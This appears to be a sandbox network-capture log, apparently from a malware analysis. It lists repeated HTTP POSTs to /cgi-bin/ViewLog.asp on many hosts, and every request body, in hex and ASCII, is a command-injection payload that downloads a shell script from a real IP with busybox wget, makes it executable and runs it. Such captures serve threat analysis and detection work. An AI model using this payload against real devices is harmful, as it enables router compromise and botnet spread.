                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            599192.168.2.234421862.232.208.1568080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:19.892976046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:20.536170959 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:20.737735987 CET701INHTTP/1.0 404 Not Found !!!
                                                            Pragma: no-cache
                                                            Content-type: text/html
                                                            WWW-Authenticate: /cgi-bin/ViewLog.asp
                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 63 65 6e 74 65 72 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 31 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 30 30 30 30 41 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 66 61 63 65 3d 22 41 72 69 61 6c 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 33 46 33 46 33 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 3d 22 23 30 30 30 30 38 30 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 64 61 72 6b 3d 22 23 30 30 30 30 38 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 54 69 6d 65 73 20 4e 65 77 20 52 6f 6d 61 69 6e 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            600192.168.2.234725262.171.190.548080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:19.901066065 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            601192.168.2.233850031.136.107.2338080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:19.913439989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:20.600094080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:21.975914001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:24.919568062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:30.550717115 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:41.557266951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:05.105880976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:50.155819893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            602192.168.2.235971094.120.5.1248080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:19.948307991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            603192.168.2.235210894.123.72.1148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.195842981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            604192.168.2.235764831.200.106.2418080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.196216106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            605192.168.2.234581831.200.108.1578080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.196450949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            606192.168.2.235759494.29.226.968080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.391668081 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            607192.168.2.233473494.44.149.788080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.571887016 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            608192.168.2.233823831.204.152.1818080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.634052992 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:20.828751087 CET859INHTTP/1.1 500 Internal Server Error
                                                            Date: Wed, 14 Feb 2024 08:29:19 GMT
                                                            Server: Apache
                                                            Content-Length: 671
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 67 65 6c 64 76 65 72 66 61 68 72 65 6e 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@geldverfahren.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            609192.168.2.233540631.136.116.898080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.644835949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:23.895669937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:30.038846970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:42.069120884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:07.153583050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:56.298860073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
